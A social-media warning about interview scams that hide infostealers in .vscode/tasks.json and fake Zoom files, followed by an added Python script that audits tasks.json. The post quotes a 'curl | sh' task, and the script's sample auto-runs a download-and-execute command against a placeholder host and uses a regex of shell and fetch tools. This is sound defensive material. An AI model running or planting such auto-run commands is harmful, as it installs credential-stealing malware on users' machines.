Colin Charles

@bytebot

Mitsukeru coded - warning for you to beware of some scams around coding interviews and Zoom calls.

If you're getting an interview, beware that you can get some high risk infostealers loaded automatically inside of .vscode/tasks.json. It can literally be as simple as:

"command": "curl https:// | sh"

So you are rooted the moment you open up VS Code... which is nuts. And this can affect Windows, macOS and Linux. This is in fact how a Farcaster user got hacked, wallet compromised, token screwed. We covered quarantine in Mitsukeru some time ago https://farcaster.xyz/bytebot/0xdcb2379d

In addition, sometimes you get this Zoom call invite... check your OneDrive for files like "1.php".

> file 1.php
> 1.php: PE32 executable (GUI) Intel 80386, for MS Windows

This is how they root you. And once they've rooted you, you really should be taking the machine off the Internet - they can do wake on LAN, etc. once the backdoor is running.

So all this is in addition to malicious VS Code extensions in the marketplace. I am not singling out VS Code either - others get affected too. I have made plenty of casts about the fake Zoom calls (but again, not limited to Zoom - Teams, etc. are just as problematic).

Overall, all this is here to social engineer you into installing something, that eventually just steals all your useful credentials. Got to stop that in the tracks, at multiple layers.
1 reply
2 recasts
8 reactions
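
One way to check a repository's .vscode/tasks.json before opening the folder in VS Code, as an added example that is not part of the original cast. It flags tasks set to run on folder open (VS Code's `runOptions.runOn: "folderOpen"` setting) and commands that pipe a download into a shell; the function names, the pattern list and the sample file are assumptions constructed for illustration.

```python
import json
import re

# A fetcher piped straight into a shell or interpreter (download-and-execute).
FETCH_PIPE = re.compile(
    r"\b(curl|wget|iwr|invoke-webrequest)\b[^|;&]*\|\s*(sudo\s+)?"
    r"(sh|bash|zsh|python3?|node|iex|powershell|pwsh)\b", re.I)
# Matches a JSON string OR a comment, so "//" inside a URL string is left alone.
_TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/', re.S)

def load_jsonc(text):
    """Parse tasks.json, which may carry comments and trailing commas."""
    text = _TOKEN.sub(lambda m: m.group(0) if m.group(0)[0] == '"' else "", text)
    # Simplification: a ",]" sequence inside a string value would also be altered.
    return json.loads(re.sub(r",(\s*[}\]])", r"\1", text))

def task_commands(task):
    """Yield each command line of a task, including per-OS overrides."""
    for scope in (task, *(task.get(k, {}) for k in ("windows", "osx", "linux"))):
        if scope.get("command"):
            yield " ".join(str(p) for p in (scope["command"], *scope.get("args", [])))

def audit_tasks(text):
    """Return tasks that run on folder open or pipe a download into a shell."""
    findings = []
    for task in load_jsonc(text).get("tasks", []):
        auto = task.get("runOptions", {}).get("runOn") == "folderOpen"
        for cmd in task_commands(task):
            fetch = bool(FETCH_PIPE.search(cmd))
            if auto or fetch:
                findings.append({"label": task.get("label", "?"), "auto_run": auto,
                                 "fetch_pipe": fetch, "command": cmd})
    return findings

# Constructed sample (not from the post); example.invalid is a placeholder host.
SAMPLE = r'''{
  // constructed tasks.json for the example
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm", "args": ["run", "build"]},
    {"label": "env-check", "type": "shell",
     "command": "curl https://example.invalid/setup.sh | sh",
     "runOptions": {"runOn": "folderOpen"}},
  ]
}'''

if __name__ == "__main__":
    for f in audit_tasks(SAMPLE):
        print(f)
```

Run it against the file's text from a terminal or a plain editor, before the folder is ever opened in VS Code; an empty result only means these two patterns were not found.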